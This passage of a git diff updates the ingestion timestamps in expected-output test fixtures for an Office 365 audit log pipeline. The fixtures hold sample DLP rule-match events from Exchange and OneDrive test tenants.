data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", @@ -323,7 +323,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.722958300Z", + "ingested": "2021-12-09T13:42:29.292347200Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleUndo\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", @@ -498,7 +498,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.722961900Z", + "ingested": "2021-12-09T13:42:29.292353800Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExceptionInfo\":\"{ \\\"Justification\\\": \\\"I really need to share those files\\\" }\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", @@ -673,7 +673,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.722964700Z", + "ingested": "2021-12-09T13:42:29.292360200Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExceptionInfo\":{\"FalsePositive\":true},\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", @@ -800,7 +800,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-17T07:32:49.722967300Z", + "ingested": "2021-12-09T13:42:29.292366400Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13310,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"a42123a9-1c07-4dde-9be6-ac71cb9fd16b\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"8398c03a-a00d-42bb-8f80-ead0ad04e1df\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected test\",\"Severity\":\"Low\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", @@ -918,7 +918,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-17T07:32:49.722969900Z", + "ingested": "2021-12-09T13:42:29.292372700Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"Id\":\"a42123a9-1c07-4dde-9be6-ac71cb9fd16b\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"8398c03a-a00d-42bb-8f80-ead0ad04e1df\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected test\",\"Severity\":\"Low\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Company-Internal-Financial.docx\",\"FileOwner\":\"alice@testsiem2.onmicrosoft.com\",\"FilePathUrl\":\"https://example.net/testsiem2.onmicrosoft.com/sharepoint\",\"From\":\"alice@testsiem2.onmicrosoft.com\",\"LastModifiedTime\":\"2020-02-24T12:13:14Z\",\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\",\"itemCreationTime\":\"2020-02-20T11:23:45\"},\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json index ab2331e730c..6c0abb8d322 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json @@ -84,7 +84,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-17T07:32:49.934357600Z", + "ingested": "2021-12-09T13:42:29.971752Z", "original": "{\"CreationTime\":\"2020-02-25T16:20:15\",\"Id\":\"a21f13b9-22b6-405b-bf9e-a07ad8d456da\",\"IncidentId\":\"3066c3c5-eb56-dd03-b000-08d7ba115afd\",\"ObjectId\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[],\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"c5981414-9f1f-4275-a2df-2fbfb1d03795\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected U.S. Financial\",\"Severity\":\"Low\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T15:22:49\",\"ItemLastModifiedTime\":\"2020-02-25T16:19:43\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", @@ -198,7 +198,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.934369600Z", + "ingested": "2021-12-09T13:42:29.971758400Z", "original": "{\"CreationTime\":\"2020-02-25T16:23:39\",\"Id\":\"eb8259c8-d2c2-449d-bd35-5c8a033eb629\",\"IncidentId\":\"eeeb7b44-fc69-c19f-b000-08d7ba115afd\",\"ObjectId\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:SiteAdmin\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":12,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"7503b92a-67c2-494b-8a46-57ef0d738886\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected U.S. Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data Copy.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data%20Copy.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T16:21:50\",\"ItemLastModifiedTime\":\"2020-02-25T16:21:44\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", @@ -308,7 +308,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-17T07:32:49.934372800Z", + "ingested": "2021-12-09T13:42:29.971764Z", "original": "{\"CreationTime\":\"2020-02-25T16:23:39\",\"Id\":\"50a90c83-7e15-4679-8778-d9dd30927e66\",\"IncidentId\":\"eeeb7b44-fc69-c19f-b000-08d7ba115afd\",\"ObjectId\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[],\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":12,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"c5981414-9f1f-4275-a2df-2fbfb1d03795\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected U.S. Financial\",\"Severity\":\"Low\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data Copy.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data%20Copy.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T16:21:50\",\"ItemLastModifiedTime\":\"2020-02-25T16:21:44\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", @@ -422,7 +422,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.934375600Z", + "ingested": "2021-12-09T13:42:29.971777700Z", "original": "{\"CreationTime\":\"2020-02-25T16:22:22\",\"Id\":\"59652f9a-087c-4b65-b88c-b293ade34202\",\"IncidentId\":\"3066c3c5-eb56-dd03-b000-08d7ba115afd\",\"ObjectId\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:SiteAdmin\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":12,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"7503b92a-67c2-494b-8a46-57ef0d738886\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected U.S. Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T15:22:49\",\"ItemLastModifiedTime\":\"2020-02-25T16:21:44\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", @@ -536,7 +536,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.934378200Z", + "ingested": "2021-12-09T13:42:29.971782400Z", "original": "{\"CreationTime\":\"2020-02-26T10:13:48\",\"Id\":\"d69c6758-f210-43bd-bac1-563adef4b4cf\",\"IncidentId\":\"f7295114-e601-f2b6-8800-08d7baa56f8b\",\"ObjectId\":\"f026407b-090a-4c15-99b5-09851842d96d\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"08745d02-5d45-48bd-98e1-8199ab1efdbe\",\"PolicyName\":\"Financial Data Detection\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:SiteAdmin\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":42,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":85,\"Count\":23,\"SensitiveType\":\"0e9b3178-9678-47dd-a509-37222ca96b42\"}]},\"RuleId\":\"bc4d376f-b038-4695-9362-609d32f963cf\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected France Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"INTERNAL CREDIT CARD NUMBERS.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/INTERNAL%20CREDIT%20CARD%20NUMBERS.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-26T09:44:40\",\"ItemLastModifiedTime\":\"2020-02-26T09:46:23\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"f026407b-090a-4c15-99b5-09851842d96d\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", @@ -650,7 +650,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.934380600Z", + "ingested": "2021-12-09T13:42:29.971787300Z", "original": 